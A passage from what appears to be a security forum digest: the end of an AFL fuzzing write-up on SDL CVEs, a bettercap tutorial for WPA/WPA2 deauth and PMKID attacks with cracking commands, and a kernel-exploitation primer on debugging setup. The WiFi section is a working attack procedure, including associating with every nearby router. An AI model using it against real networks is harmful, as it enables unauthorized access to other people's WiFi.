fuzzer : 1 faves, 7 total (on average) Crashes found : 22 locally unique With 5 parallel fuzzers, we get more than 1500 executions per second, which is a decent speed. Let’s see them working! Results After one day of fuzzing, we got a total of 60 unique crashes. Triaging them, we obtained 12 notable ones, which were reported to the SDL community and MITRE. 
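Before listing the CVEs, a quick aside on the persistent-mode tweak from the optimization list above. This is a sketch of my own (not the exact code used in the campaign) showing what the harness main() might look like with __AFL_LOOP, assuming the same includes and wave globals as the harness shown earlier and that the file is built with afl-clang-fast:

/* Persistent-mode variant of the harness body (sketch only).
 * AFL restarts the process after 1000 iterations; each iteration
 * re-reads the current test case that afl-fuzz wrote to argv[1]. */
int main(int argc, char *argv[]) {
    if (SDL_Init(SDL_INIT_AUDIO) < 0)
        return 1;

#ifdef __AFL_HAVE_MANUAL_CONTROL
    __AFL_INIT();   /* start the forkserver only after SDL_Init() */
#endif

    while (__AFL_LOOP(1000)) {
        if (SDL_LoadWAV(argv[1], &wave.spec, &wave.sound, &wave.soundlen) != NULL)
            SDL_FreeWAV(wave.sound);
    }

    SDL_Quit();
    return 0;
}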
As a result of those reports, CVE-2019-7572, CVE-2019-7573, CVE-2019-7574, CVE-2019-7575, CVE-2019-7576, CVE-2019-7577, CVE-2019-7578, CVE-2019-7635, CVE-2019-7636, CVE-2019-7637 and CVE-2019-7638 were assigned. The maintainers of the library acknowledged that the vulnerabilities are also present in the latest version (2.0.9). Just to emphasize how long bugs can stay well hidden: some of these vulnerabilities were introduced by a commit dating from 2006 and had not been discovered until now.

LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS
Ixia's Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia test platforms. The ATI Research Center continuously monitors threats as they appear in the wild. Customers of our BreakingPoint product have access to strikes for different attacks, allowing them to test their currently deployed security controls' ability to detect or block such attacks; this capability can afford you time to patch your deployed web applications. Our monitoring of in-the-wild attackers ensures that such attacks are also blocked for customers of Ixia ThreatARMOR.

Source: https://www.ixiacom.com/company/blog/how-use-fuzzing-security-research
    1 point
  16. Pwning WPA/WPA2 Networks With Bettercap and the PMKID Client-Less Attack
2019-02-13 bettercap, deauth, handshake, hashcat, pmkid, rsn, rsn pmkid, wpa, wpa2

In this post, I'll talk about the new WiFi-related features that have recently been implemented into bettercap, starting from how the EAPOL 4-way handshake capturing has been automated, up to a whole new type of attack that will allow us to recover WPA PSK passwords of an AP without clients. We'll start with the assumption that your WiFi card supports monitor mode and packet injection (I use an AWUS1900 with this driver), that you have a working hashcat installation (v4.2.0 or higher is required, ideally with GPU support enabled) for cracking, and that you know how to use it properly for either dictionary or brute-force attacks, as no tips on how to tune the masks and/or generate proper dictionaries will be given. On newer macOS laptops, the builtin WiFi interface en0 already supports monitor mode, meaning you won't need a Linux VM in order to run this.

Deauth and 4-way Handshake Capture

First things first, let's try a classical deauthentication attack: we'll start bettercap, enable the wifi.recon module with channel hopping and configure the ticker module to refresh our screen every second with an updated view of the nearby WiFi networks (replace wlan0 with the interface you want to use):

sudo bettercap -iface wlan0
# this will set the interface in monitor mode and start channel hopping on all supported frequencies
> wifi.recon on
# we want our APs sorted by number of clients for this attack, the default sorting would be `rssi asc`
> set wifi.show.sort clients desc
# every second, clear our view and present an updated list of nearby WiFi networks
> set ticker.commands 'clear; wifi.show'
> ticker on

You should now see something like this:

Assuming Casa-2.4 is the network we want to attack, let's stick to channel 1 in order to avoid jumping to other frequencies and potentially losing useful packets:

> wifi.recon.channel 1

What we want to do now is force one or more of the client stations (we can see 5 of them for this AP) to disconnect by forging fake deauthentication packets. Once they reconnect, hopefully, bettercap will capture the needed EAPOL frames of the handshake that we'll later pass to hashcat for cracking (replace e0:xx:xx:xx:xx:xx with the BSSID of your target AP):

> wifi.deauth e0:xx:xx:xx:xx:xx

If everything worked as expected and you're close enough to the AP and the clients, bettercap will start informing you that complete handshakes have been captured (you can customize the pcap file output by changing the wifi.handshakes.file parameter). Not only will bettercap check for complete handshakes and dump them only when all the required packets have been captured, it will also append to the file one beacon packet for each AP, in order to allow any tool reading the pcap to detect both the BSSIDs and the ESSIDs. The downsides of this attack are obvious: no clients = no party; moreover, given that we need to wait for at least one of them to reconnect, it can potentially take some time.

4-way Handshake Cracking

Once we have successfully captured the EAPOL frames required by hashcat in order to crack the PSK, we'll need to convert the pcap output file to the hccapx format that hashcat can read.
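What hashcat then does with that file, for every candidate passphrase, is essentially rebuild the PMK and check it against the captured handshake; the expensive part is the PBKDF2 step (PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)). A minimal sketch of just that derivation follows; it is my own illustration, not part of the original post or something you need for the attack, and it assumes OpenSSL is available (compile with -lcrypto):

#include <stdio.h>
#include <string.h>
#include <openssl/evp.h>

/* Derive the WPA/WPA2 PMK from a candidate passphrase and the ESSID. */
int main(int argc, char *argv[]) {
    if (argc != 3) {
        fprintf(stderr, "usage: %s <essid> <passphrase>\n", argv[0]);
        return 1;
    }
    unsigned char pmk[32];

    if (!PKCS5_PBKDF2_HMAC_SHA1(argv[2], (int)strlen(argv[2]),
                                (const unsigned char *)argv[1], (int)strlen(argv[1]),
                                4096, sizeof(pmk), pmk)) {
        fprintf(stderr, "PBKDF2 failed\n");
        return 1;
    }
    for (size_t i = 0; i < sizeof(pmk); i++)
        printf("%02x", pmk[i]);
    printf("\n");
    return 0;
}

hashcat performs this derivation, plus the PTK/MIC verification, for every guess at GPU speed; all we have to do is hand it the captured material in a format it understands.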
To do the conversion, we can either use this online service, or install the hashcat-utils ourselves and convert the file locally:

/path/to/cap2hccapx /root/bettercap-wifi-handshakes.pcap bettercap-wifi-handshakes.hccapx

You can now proceed to crack the handshake(s) either by dictionary attack or by brute force. For instance, to try all 8-digit combinations:

/path/to/hashcat -m2500 -a3 -w3 bettercap-wifi-handshakes.hccapx '?d?d?d?d?d?d?d?d'

And this is it, the evergreen deauthentication attack in all its simplicity, performed with just one tool ... let's get to the fun part now.

Client-less PMKID Attack

In 2018 the hashcat authors disclosed a new type of attack which not only relies on one single packet, but doesn't require any clients to be connected to our target AP or, if clients are connected, doesn't require us to send deauth frames to them. There's no interaction between the attacker and the client stations, just between the attacker and the AP, an interaction which, if the router is vulnerable, is almost immediate!

It turns out that a lot of modern routers append an optional field at the end of the first EAPOL frame sent by the AP itself when someone is associating, the so-called Robust Security Network (RSN) element, which includes something called the PMKID. As explained in the original post, the PMKID is derived using data which is known to us:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the "PMK Name" string is constant, we know both the BSSID of the AP and of the station, and the PMK is the same one obtained from a full 4-way handshake. This is all hashcat needs in order to crack the PSK and recover the passphrase!

Here's where the new wifi.assoc command comes into play: instead of deauthenticating existing clients as shown in the previous attack and waiting for the full handshake to be captured, we'll simply start to associate with the target AP and listen for an EAPOL frame containing the RSN PMKID data. Say we're still listening on channel 1 (since we previously ran wifi.recon.channel 1), let's send such an association request to every AP and see who'll respond with useful information:

# wifi.assoc supports 'all' (or `*`) or a specific BSSID, just like wifi.deauth
> wifi.assoc all

All nearby vulnerable routers (and let me reiterate: a lot of them are vulnerable) will start sending you the PMKID, which bettercap will dump to the usual pcap file.

PMKID Cracking

We'll now need to convert the PMKID data in the pcap file we just captured to a hash format that hashcat can understand; for this we'll use hcxpcaptool:

/path/to/hcxpcaptool -z bettercap-wifi-handshakes.pmkid /root/bettercap-wifi-handshakes.pcap

We can now proceed to crack the bettercap-wifi-handshakes.pmkid file generated this way, using hash mode 16800:

/path/to/hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'

Recap

Goodbye airmon, airodump, aireplay and whatnot: one tool to rule them all! Goodbye Kali VMs on macOS: these modules work natively out of the box, with the default Apple hardware ❤️ Full 4-way handshakes are for n00bs: just one association request and most routers will send us enough key material. Enjoy!

Source: https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/#
    1 point
  17. Point of no C3 | Linux Kernel Exploitation - Part 0
Exploit Development

In the name of Allah, the most beneficent, the most merciful.
HAHIRRITATEDAHAHAHAHAHAHAHA "Appreciate the art, master the craft." AHAHAHAHOUTDATEDAHAHAHAHAH
It's been more than a year, huh? But I'm back, with "Point of no C3". Its main focus will be Kernel Exploitation, but that won't stop it from looking at other things.

Summary
Chapter I: Environment setup: Preparing the VM, Using KGDB to debug the kernel, Compiling a simple module, What?, Few structs, Debug a module
Chapter II: Overview on security and General understanding: Control Registers, SMAP, SMEP, Write-Protect, Paging (a bit of segmentation too), Processes, Syscalls, IDT (Interrupt Descriptor Table), KSPP, KASLR, kptr_restrict, mmap_min_addr, addr_limit

Chapter I: Environment setup
"No QEMU for you."

Preparing the VM:
To begin with, we set up the environment and the VMs in order to experiment on them. For this, Debian was chosen (core only). Other choices include SUSE, CentOS, etc.

debian-9.4.0-amd64-netinst.iso 2018-03-10 12:56 291M [X]
debian-9.4.0-amd64-xfce-CD-1.iso 2018-03-10 12:57 646M
debian-mac-9.4.0-amd64-netinst.iso 2018-03-10 12:56 294M

A VM is then created with at least 35 GB of disk space (hey, it's for compiling the kernel!).

Installer disc image file (iso): [C:\vm\debian-9.4.0-amd64-netinst.iso [▼]] ⚠ Could not detect which operating system is in this disc image. You will need to specify which operating system will be installed.

Once you boot it, you can proceed with Graphical Install and, since we only want the core, stop at Software selection and have only SSH server and standard system utilities selected. When it's done, you'll have your first VM ready.

Debian GNU/Linux 9 Nwwz tty1 Hint: Num Lock on Nwwz login: root Password: Linux Nwwz 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@Nwwz:~#

Next, we want to get the latest stable Linux kernel release (4.17.2 at the time of writing) and run it.
We would start by installing necessary packages: apt-get install git build-essential fakeroot ncurses* libssl-dev libelf-dev ccache gcc-multilib bison flex bc Downloading the kernel tarball and the patch: root@Nwwz:~# cd /usr/src root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/linux-4.17.2.tar.gz" root@Nwwz:/usr/src# wget "https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/patch-4.17.2.gz" Extracting them: root@Nwwz:/usr/src# ls linux-4.17.2.tar.gz patch-4.17.2.gz root@Nwwz:/usr/src# gunzip patch-4.17.2.gz root@Nwwz:/usr/src# gunzip linux-4.17.2.tar.gz root@Nwwz:/usr/src# tar -xvf linux-4.17.2.tar Moving and applying the patch: root@Nwwz:/usr/src# ls linux-4.17.2 linux-4.17.2.tar patch-4.17.2 root@Nwwz:/usr/src# mv patch-4.17.2 linux-4.17.2/ root@Nwwz:/usr/src# cd linux-4*2 root@Nwwz:/usr/src/linux-4.17.2# patch -p1 < patch-4.17.2 Cleaning the directory and copying the original bootfile to the current working directory and changing the config with an ncurses menu: root@Nwwz:/usr/src/linux-4.17.2# make mrproper root@Nwwz:/usr/src/linux-4.17.2# make clean root@Nwwz:/usr/src/linux-4.17.2# cp /boot/config-$(uname -r) .config root@Nwwz:/usr/src/linux-4.17.2# make menuconfig One must then set up the following fields: [*] Networking support ---> Device Drivers ---> Firmware Drivers ---> File systems ---> [X] Kernel hacking ---> printk and dmesg options ---> [X] Compile-time checks and compiler options ---> ... [*] Compile the kernel with debug info ... ... -*- Kernel debugging ... [*] KGDB: kernel debugger Do you wish to save your new configuration? Press <ESC><ESC> to continue kernel configuration. [< Yes >] < No > Make sure you do have similiar lines on .config: CONFIG_STRICT_KERNEL_RWX=n CONFIG_DEBUG_INFO=y CONFIG_HAVE_HARDENED_USERCOPY_ALLOCATOR=n CONFIG_HARDENED_USERCOPY=n CONFIG_HARDENED_USERCOPY_FALLBACK=n Before starting the compiling process, to faster the process, you can split the work to multiple jobs(on different processors). nproc would hand you the number of processing units available. root@Nwwz:/usr/src/linux-4.17.2# nproc 4 root@Nwwz:/usr/src/linux-4.17.2# make -j4 It will then automatically go through stage 1 & 2: Setup is 17116 bytes (padded to 17408 bytes). System is 4897 kB CRC 2f571cf0 Kernel: arch/x86/boot/bzImage is ready (#1) Building modules, stage 2. MODPOST 3330 modules (SNIP) CC virt/lib/irqbypass.mod.o LD [M] virt/lib/irqbypass.ko root@Nwwz:/usr/src/linux-4.17.2# If somehow, there’s no stage two, a single command should be executed before moving on: (This normally isn’t required.) 
make modules Installing the modules: root@Nwwz:/usr/src/linux-4.17.2# make modules_install (SNIP) INSTALL sound/usb/usx2y/snd-usb-usx2y.ko INSTALL virt/lib/irqbypass.ko DEPMOD 4.17.0 root@Nwwz:/usr/src/linux-4.17.2# Installing and preparing the kernel for boot: root@Nwwz:/usr/src/linux-4.17.2# make install (SNIP) Found linux image: /boot/vmlinuz-4.17.0 Found initrd image: /boot/initrd.img-4.17.0 Found linux image: /boot/vmlinuz-4.9.0-6-amd64 Found initrd image: /boot/initrd.img-4.9.0-6-amd64 done root@Nwwz:/usr/src/linux-4.17.2# cd /boot root@Nwwz:/boot# mkinitramfs -o /boot/initrd.img-4.17.0 4.17.0 root@Nwwz:/boot# reboot You can then choose the new kernel from the boot screen: *Debian GNU/Linux, with Linux 4.17.0 Debian GNU/Linux, with Linux 4.17.0 (recovery mode) Debian GNU/Linux, with Linux 4.9.0-6-amd64 Debian GNU/Linux, with Linux 4.9.0-6-amd64 (recovery mode) If it fails however, saying that it’s an out-of-memory problem, you can reduce the size of the boot image. root@Nwwz:/boot# cd /lib/modules/4.17.0/ root@Nwwz:/lib/modules/4.17.0# find . -name *.ko -exec strip --strip-unneeded {} + root@Nwwz:/lib/modules/4.17.0# cd /boot root@Nwwz:/boot# mkinitramfs -o initrd.img-4.17.0 4.17.0 It’ll then boot successfully. root@Nwwz:~# uname -r 4.17.0 Using KGDB to debug the kernel: Installing ifconfig and running it would be the first thing to do: root@Nwwz:~# apt-get install net-tools (SNIP) root@Nwwz:~# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.150.145 netmask 255.255.255.0 broadcast 192.168.150.255 (SNIP) Back to Debian machine, transfering vmlinux to the host is done with SCP or WinSCP in my case. root@Nwwz:~# service ssh start .. Répertoire parent vmlinux 461 761 KB Fichier With this, you’ll have debug symbols ready, but you still need to enable KGDB for the target kernel. root@Nwwz:~# cd /boot/grub root@Nwwz:/boot/grub# nano grub.cfg Editing a single line, adding __setup arguments, we would then be able to manipulate the kernel for our needs, such as disabling KASLR and enabling KGDB. Search for the first ‘Debian GNU’ occurence and make sure it’s the wanted kernel, and add the following to the line starting with [X]: kgdboc=ttyS1,115200 kgdbwait nokaslr. menuentry 'Debian GNU/Linux' --class debian --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-b1a66d11-d729-4f23-99b0-4ddfea0af6c5' { ... echo 'Loading Linux 4.17.0 ...' [X] linux /boot/vmlinuz-4.17.0 root=UUID=b1a66d11-d729-4f23-99b0-4ddfea0af6c5 ro quiet kgdboc=ttyS1,115200 kgdbwait nokaslr echo 'Loading initial ramdisk ...' initrd /boot/initrd.img-4.17.0 } In order to debug the running kernel, another VM similer to the one made previously(Debian) will be created(Debian HOST). Now shutdown both VMs in order to set the pipe: Debian: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the server. [▼]] [The other end is a virtual machine. [▼]] ---------------------------------------------7 I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode). DebianHOST: ⦿ Use named pipe: *---------------------------------------* | \\.\pipe\com_2 | *---------------------------------------* [This end is the client. [▼]] [The other end is a virtual machine. 
[▼]] I/O mode ⧆ Yield CPU on poll Allow the guest operating system to use this serial port in polled mode (as opposed to interrupt mode).

Getting the vmlinux image to DebianHOST after installing necessary packages:

root@Nwwz:~# apt-get install gcc gdb git net-tools
root@Nwwz:~# cd /home/user
root@Nwwz:/home/user# ls
vmlinux
root@Nwwz:/home/user# gdb vmlinux
GNU gdb (Debian 7.12-6) 7.12.0.20161007-git
(SNIP)

Turning Debian back on would result in a similar message:

KASLR disabled: 'nokaslr' on cmdline.
[ 1.571915] KGDB: Waiting for connection from remote gdb...

Attaching to DebianHOST's GDB is then possible:

(gdb) set serial baud 115200
(gdb) target remote /dev/ttyS1
Remote debugging using /dev/ttyS1
kgdb_breakpoint () at kernel/debug/debug_core.c:1073
1073 wmb(); /* Sync point after breakpoint */
(gdb) list
1068 noinline void kgdb_breakpoint(void)
1069 {
1070 atomic_inc(&kgdb_setting_breakpoint);
1071 wmb(); /* Sync point before breakpoint */
1072 arch_kgdb_breakpoint();
1073 wmb(); /* Sync point after breakpoint */
1074 atomic_dec(&kgdb_setting_breakpoint);
1075 }
1076 EXPORT_SYMBOL_GPL(kgdb_breakpoint);
1077
(gdb)

Know that once you type 'continue' in GDB, you won't be able to control it again unless you use the magic SysRq key to force a SIGTRAP to happen:

root@Nwwz:~# echo "g" > /proc/sysrq-trigger

And you can see in DebianHOST that it works.

(SNIP) [New Thread 459] [New Thread 462] [New Thread 463] [New Thread 476] [New Thread 485] [New Thread 487]
Thread 56 received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 489]
kgdb_breakpoint () at kernel/debug/debug_core.c:1073
1073 wmb(); /* Sync point after breakpoint */
(gdb)

Compiling a simple module:
A simple Hello 0x00sec module will be created. We need to make a directory in the root folder and prepare two files:

root@Nwwz:~# mkdir mod
root@Nwwz:~# cd mod
root@Nwwz:~/mod/# nano hello.c

#include <linux/init.h>
#include <linux/module.h>

static void hello_exit(void){
	printk(KERN_INFO "Goodbye!\n");
}

static int hello_init(void){
	printk(KERN_INFO "Hello 0x00sec!\n");
	return 0;
}

MODULE_LICENSE("GPU");
module_init(hello_init);
module_exit(hello_exit);

root@Nwwz:~/mod/# nano Makefile

obj-m += hello.o
KDIR = /lib/modules/$(shell uname -r)/build

all:
	make -C $(KDIR) M=$(PWD) modules

clean:
	rm -rf *.ko *.o *.mod.* *.symvers *.order

Then one can compile using 'make' and insert/remove the module into the kernel to trigger both the init and exit handlers.

root@Nwwz:~/mod# make
make -C /lib/modules/4.17.0/build M=/root/mod modules
make[1]: Entering directory '/usr/src/linux-4.17.2'
CC [M] /root/mod/hello.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/mod/hello.mod.o
LD [M] /root/mod/hello.ko
make[1]: Leaving directory '/usr/src/linux-4.17.2'
root@Nwwz:~/mod# insmod hello.ko
root@Nwwz:~/mod# rmmod hello.ko

The messages are then saved in the dmesg circular buffer.

root@Nwwz:~/mod# dmesg | grep Hello
[ 6545.039487] Hello 0x00sec!
root@Nwwz:~/mod# dmesg | grep Good
[ 6574.452282] Goodbye!

To clean the current directory:

root@Nwwz:~/mod# make clean

What?:
The kernel doesn't rely on the C library we're used to; it's judged useless there. Instead, once a module is linked and loaded into kernel-space (which requires root privileges, duh), it relies on what the kernel itself provides.
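To make the "no libc" point concrete, here is a small sketch of my own (not from the original post) showing kernel-side stand-ins for a few familiar calls; buf and demo() are made-up names:

#include <linux/kernel.h>   /* printk, snprintf           */
#include <linux/slab.h>     /* kmalloc, kfree, GFP_KERNEL */
#include <linux/jiffies.h>  /* jiffies                    */
#include <linux/errno.h>    /* ENOMEM                     */

static int demo(void)
{
	char *buf;

	buf = kmalloc(64, GFP_KERNEL);              /* malloc()  -> kmalloc(size, flags) */
	if (!buf)
		return -ENOMEM;

	snprintf(buf, 64, "jiffies=%lu", jiffies);  /* sprintf() -> kernel's snprintf()  */
	printk(KERN_INFO "%s\n", buf);              /* printf()  -> printk()             */

	kfree(buf);                                 /* free()    -> kfree()              */
	return 0;
}

Everything here comes from kernel headers; nothing is linked against glibc.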
A module can use the header files available in the kernel source tree, which offer a huge number of functions, such as printk(), which logs a message and sets its priority, and module_init()/module_exit(), which declare the initialization and clean-up functions. And while applications usually run with little chance of having their variables changed by another thread, this certainly isn't the case for LKMs, since what they offer can be used by multiple processes at the same time, which can lead (if the data dealt with is sensitive, i.e. in a critical region) to a panic, or worse (better?), a compromise.

Few structs:
The kernel implements multiple kinds of locks; only semaphores and spinlocks will likely be used here. When a semaphore is already held, the thread will sleep, waiting for the lock to be released so it can claim it. That's why it's a sleeping lock and, therefore, only used in process context.

/* Please don't access any members of this structure directly */
struct semaphore {
	raw_spinlock_t lock;
	unsigned int count;
	struct list_head wait_list;
};

It can then be initialized with sema_init() or DEFINE_SEMAPHORE():

#define __SEMAPHORE_INITIALIZER(name, n)				\
{									\
	.lock		= __RAW_SPIN_LOCK_UNLOCKED((name).lock),	\
	.count		= n,						\
	.wait_list	= LIST_HEAD_INIT((name).wait_list),		\
}

static inline void sema_init(struct semaphore *sem, int val)
{
	static struct lock_class_key __key;
	*sem = (struct semaphore) __SEMAPHORE_INITIALIZER(*sem, val);
	lockdep_init_map(&sem->lock.dep_map, "semaphore->lock", &__key, 0);
}

with val being the number of processes that can hold the lock at once. It's normally set to 1, and a semaphore with a count of 1 is called a mutex. Another type of lock is the spinlock; it keeps the thread spinning instead of sleeping, and for that reason it can be used in interrupt context.

typedef struct spinlock {
	union {
		struct raw_spinlock rlock;
#ifdef CONFIG_DEBUG_LOCK_ALLOC
# define LOCK_PADSIZE (offsetof(struct raw_spinlock, dep_map))
		struct {
			u8 __padding[LOCK_PADSIZE];
			struct lockdep_map dep_map;
		};
#endif
	};
} spinlock_t;

#define __RAW_SPIN_LOCK_INITIALIZER(lockname)	\
{						\
	.raw_lock = __ARCH_SPIN_LOCK_UNLOCKED,	\
	SPIN_DEBUG_INIT(lockname)		\
	SPIN_DEP_MAP_INIT(lockname) }

#define __RAW_SPIN_LOCK_UNLOCKED(lockname)	\
	(raw_spinlock_t) __RAW_SPIN_LOCK_INITIALIZER(lockname)

# define raw_spin_lock_init(lock)	\
	do { *(lock) = __RAW_SPIN_LOCK_UNLOCKED(lock); } while (0)
#endif

static __always_inline raw_spinlock_t *spinlock_check(spinlock_t *lock)
{
	return &lock->rlock;
}

#define spin_lock_init(_lock)			\
do {						\
	spinlock_check(_lock);			\
	raw_spin_lock_init(&(_lock)->rlock);	\
} while (0)

Enough with locks, what about file_operations? This struct holds the possible operations that can be called on a device/file/entry. When creating a character device by directly calling cdev_alloc() or misc_register(), it has to be provided, along with the major (for the first function only) and the minor. It is defined as follows:

struct file_operations {
	struct module *owner;
	loff_t (*llseek) (struct file *, loff_t, int);
	ssize_t (*read) (struct file *, char __user *, size_t, loff_t *);
	ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *);
	...
} __randomize_layout;

There are similar structs too, such as inode_operations, block_device_operations and tty_operations… They all provide handlers for userspace operations when the file/inode/blockdev/tty is the target. These are sometimes used by attackers to redirect execution, perf_fops or ptmx_fops being common targets.
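To make the distinction concrete, here is a minimal sketch of my own (not from the original post) of how the two lock types are typically used inside a module; cfg_sem, stats_lock and the two helpers are made-up names:

#include <linux/semaphore.h>
#include <linux/spinlock.h>
#include <linux/errno.h>

static DEFINE_SEMAPHORE(cfg_sem);     /* count = 1, i.e. a mutex-like semaphore */
static DEFINE_SPINLOCK(stats_lock);
static unsigned long stats_counter;

static int update_config(void)
{
	/* Process context only: the caller may sleep while waiting for the lock. */
	if (down_interruptible(&cfg_sem))
		return -ERESTARTSYS;
	/* ... touch the shared configuration ... */
	up(&cfg_sem);
	return 0;
}

static void bump_stats(void)
{
	unsigned long flags;

	/* Safe in interrupt context: spins instead of sleeping. */
	spin_lock_irqsave(&stats_lock, flags);
	stats_counter++;
	spin_unlock_irqrestore(&stats_lock, flags);
}

The rule of thumb follows from the definitions above: if the code may sleep, take the semaphore; if it may run in interrupt context, take the spinlock and keep the critical section short.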
The kernel provides some structs for lists with different search times. The first being double linked-list, list_head, it’s definition is simple, pointing to the next and previous list_head. struct list_head { struct list_head *next, *prev; }; While the second is redblack tree, rb_node, provides better search time. struct rb_node { unsigned long __rb_parent_color; struct rb_node *rb_right; struct rb_node *rb_left; } __attribute__((aligned(sizeof(long)))); It can be used to find the target value faster, if it’s bigger than the first node(head), then go right, else, go left. Function container_of() can then be used to extract the container struct. Note: Each device, can have multiple minors, but it’ll necessarily have a single major. root@Nwwz:/# cd /dev root@Nwwz:/dev# ls -l total 0 crw------- 1 root root [10], 175 Feb 9 09:24 agpgart | *-> Same major, different minors. | crw-r--r-- 1 root root [10], 235 Feb 9 09:24 autofs drwxr-xr-x 2 root root 160 Feb 9 09:24 block drwxr-xr-x 2 root root 80 Feb 9 09:24 bsg (SNIP) [c]rw-rw-rw- 1 root tty [5], [2] Feb 9 12:06 ptmx | | | | | *--> Minor *---> Character Device *---> Major (SNIP) [b]rw-rw---- 1 root cdrom [11], [0] Feb 9 09:24 sr0 | | | | | *--> Minor *---> Block Device *---> Major (SNIP) Debug a module: When we started gdb, the only image it was aware of, is the vmlinux one. It doesn’t know about the loaded module, and doesn’t know about the load location. In order to provide these things and make debugging the module possible, one has to first transfer the target module to DebianHOST. root@Nwwz:~/mod# service ssh start Once that’s done, one should find different sections and addresses of the LKM in memory: root@Nwwz:~/mod# insmod simple.ko root@Nwwz:~/mod# cd /sys/module/simple/sections root@Nwwz:/sys/module/simple/sections# ls -la total 0 drwxr-xr-x 2 root root 0 Aug 11 06:30 . drwxr-xr-x 5 root root 0 Aug 2 17:55 .. -r-------- 1 root root 4096 Aug 11 06:31 .bss -r-------- 1 root root 4096 Aug 11 06:31 .data -r-------- 1 root root 4096 Aug 11 06:31 .gnu.linkonce.this_module -r-------- 1 root root 4096 Aug 11 06:31 __mcount_loc -r-------- 1 root root 4096 Aug 11 06:31 .note.gnu.build-id -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind -r-------- 1 root root 4096 Aug 11 06:31 .orc_unwind_ip -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.1 -r-------- 1 root root 4096 Aug 11 06:31 .rodata.str1.8 -r-------- 1 root root 4096 Aug 11 06:31 .strtab -r-------- 1 root root 4096 Aug 11 06:31 .symtab -r-------- 1 root root 4096 Aug 11 06:31 .text root@Nwwz:/sys/module/simple/sections# cat .text 0xffffffffc054c000 root@Nwwz:/sys/module/simple/sections# cat .data 0xffffffffc054e000 root@Nwwz:/sys/module/simple/sections# cat .bss 0xffffffffc054e4c0 Back to DebianHOST and in gdb: (gdb) add-symbol-file simple.ko 0xffffffffc054c000 -s .data 0xffffffffc054e000 -s .bss 0xffffffffc054e4c0 And that’s it. Chapter II: Overview on security and General understanding “Uuuuh, it’s simple?” Control Registers: CRs are special registers, being invisible to the user, they hold important information on the current CPU and the process running on it. x86_32 and x86_64: Keep in mind that their sizes are different(64bit for x86_64, 32bit for x86_32). 
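Since they're invisible from user-space, the quickest way to peek at them is from a module. This is a minimal sketch of my own (not from the original post), assuming x86_64 and kernel context; read_cr0() is the same helper the WP example later in this chapter relies on, and rd_cr4() is a made-up name:

#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/special_insns.h>

/* Read CR4 directly with inline assembly; CR0 has a ready-made helper. */
static unsigned long rd_cr4(void)
{
	unsigned long val;
	asm volatile("mov %%cr4, %0" : "=r" (val));
	return val;
}

static int crdump_init(void)
{
	printk(KERN_INFO "CR0 = %016lx CR4 = %016lx\n", read_cr0(), rd_cr4());
	return 0;
}

static void crdump_exit(void) { }

MODULE_LICENSE("GPL");
module_init(crdump_init);
module_exit(crdump_exit);

With the raw values in dmesg, the bit layouts below tell you which features are actually enabled.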
CR0: x32 and x64: #0: PE(Protected Mode Enable) #1: MP(Monitor co-processor) #2: EM(Emulation) #3: TS(Task Switched) #4: ET(Extension Type) #5: NE(Numeric Error) #6-15: Reserved #16: WP(Write Protect) #17: Reserved #18: AM(Alignment Mask) #19-28: Reserved #29: NW(Not-Write Through) #30: CD(Cache Disable) #31: PG(Paging) x64 only: #32-61: Reserved

CR2: Solely contains the PFLA (Page Fault Linear Address), which is extracted by the do_page_fault() function and passed to __do_page_fault() to be handled.

dotraplinkage void notrace
do_page_fault(struct pt_regs *regs, unsigned long error_code)
{
	unsigned long address = read_cr2(); /* Get the faulting address */
	enum ctx_state prev_state;

	prev_state = exception_enter();
	if (trace_pagefault_enabled())
		trace_page_fault_entries(address, regs, error_code);

	__do_page_fault(regs, error_code, address);

	exception_exit(prev_state);
}
NOKPROBE_SYMBOL(do_page_fault);

CR3: This register contains the physical address of the current process's PGD (Page Global Directory), which (once converted back to a virtual address) links to the next level (P4D on five-level page tables, PUD on four-level page tables); in the end, it's all there to find the same struct, that is, struct page.

static inline unsigned long read_cr3_pa(void)
{
	return __read_cr3() & CR3_ADDR_MASK;
}

static inline unsigned long native_read_cr3_pa(void)
{
	return __native_read_cr3() & CR3_ADDR_MASK;
}

static inline void load_cr3(pgd_t *pgdir)
{
	write_cr3(__sme_pa(pgdir));
}

This is used, as an example, when an Oops happens and the kernel calls dump_pagetable().

